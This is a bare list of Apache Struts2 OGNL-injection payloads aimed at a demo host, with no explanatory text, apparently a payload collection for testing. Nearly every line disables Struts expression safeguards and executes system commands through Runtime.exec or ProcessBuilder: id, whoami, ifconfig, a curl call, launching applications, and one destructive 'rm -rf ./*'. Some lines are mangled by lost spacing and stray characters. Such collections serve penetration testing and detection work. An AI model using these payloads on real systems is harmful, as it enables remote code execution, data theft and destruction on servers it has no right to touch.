%{#em=@javax.persistence.Persistence@createEntityManagerFactory("test").createEntityManager(),#em.createQuery("select*fromStudent")}
%{@java.lang.Runtime@getRuntime().exec('curlhttp:/127.0.0.1:10000/')}
http:/www.glassy.com/Struts2Demo_war_exploded/hello.jsp?fakeParam=%{#a=(newjava.lang.ProcessBuilder(newjava.lang.String[]{"/bin/bash","-c","open/Applications/Notes.app/"})).start()}
(#_memberAccess["allowStaticMethodAccess"]=true,#foo=newjava.lang.Boolean("false"),#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream()))+'
debug=command&expression=#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),#b=newjava.io.InputStreamReader(#a),#c=newjava.io.BufferedReader(#b),#d=newchar[50000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()?age=12313&name=(#context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+#_memberAccess["allowStaticMethodAccess"]=true,+#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new+java.io.BufferedReader(#b),#d=new+char[51020],#c.read(#d),#kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kxlzx.println(#d),#kxlzx.close())(meh)&z[(name)('meh')]
xxx=${#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=newjava.io.InputStreamReader(#a),#c=newjava.io.BufferedReader(#b),#d=newchar[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println('dbapp='+newjava.lang.String(#d)),#out.close()}
%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
http:/www.glassy.com/Struts2Demo_war_exploded/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ifconfig').getInputStream()),#q}.action
http:/www.glassy.com/test.action?('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(a)(b)&('\u0023_memberAccess.exclude\u003d@java.util.Collections@EMPTY_SET')(a)(b)&('\u0023_memberAccess.allowStaticMethodAccess\u003dfalse')(a)(b)&('\u0040java.lang.Runtime@getRuntime().exec(\'/bin/bash\u0020-c\u0020rm\u0020-rf\u0020./*\')')(a)(b)
http:/www.glassy.com/test.action?('#context[\'xwork.MethodAccessor.denyMethodExecution\']=false')(a)(b)&('@java.lang.Runtime@getRuntime().exec(\'open/Applications/Notes.app/\')')(a)(b)
http:/www.glassy.com/test.action?('#context[\'xwork.MethodAccessor.denyMethodExecution\']=false')(a)(b)&('#_memberAccess.excludeProperties=@java.util.Collections@EMPTY_SET')(a)(b)&('#_memberAccess.allowStaticMethodAccess=false')(a)(b)&('@java.lang.Runtime@getRuntime().exec(\'open/Applications/Notes.app/\')')(a)(b)
http:/www.glassy.com/struts2-showcase/home11.action?method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]),d&cmd=/Applications/Notes.app/Contents/MacOS/Notes
x=${(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#_memberAccess['allowStaticMethodAccess']=true)(@java.lang.Runtime@getRuntime().exec("id"))}
%{#context["xwork.MethodAccessor.denyMethodExecution"]=false,@java.io.FilterWriter@available()}
http:/www.glassy.com/test.action?password=(#context["xwork.MethodAccessor.denyMethodExecution"]=newjava.lang.Boolean(false),#_memberAccess["allowStaticMethodAccess"]=newjava.lang.Boolean(true),@java.lang.Runtime@getRuntime().exec('/Applications/Notes.app/Contents/MacOS/Notes'))(meh)&z[(password)(meh)]=true
http:/www.glassy.com/Struts2Demo_war_exploded/s2029.action?message=(#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('open/Applications/Notes.app/').getInputStream()))
%{@java.io.InputStreamReader.read()}
%{@java.io.InputStreamReader.ready()}
http:/www.glassy.com/Struts2Demo_war_exploded/s2053.action?name=%{(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#a=(newjava.lang.ProcessBuilder('/Applications/Notes.app/Contents/MacOS/Notes')).start())}
http:/www.glassy.com/Struts2Demo_war_exploded/hello.action?redirect:${#a=(newjava.lang.ProcessBuilder(newjava.lang.String[]{'/bin/bash','-c','open/Applications/Notes.app/'})).start()}
%{#_memberAccess.allowStaticMethodAccess=true,@java.io.FileOutpu++++++**tStream@hashCode()}
%{newjava.io.DataInputStream().readLine()}
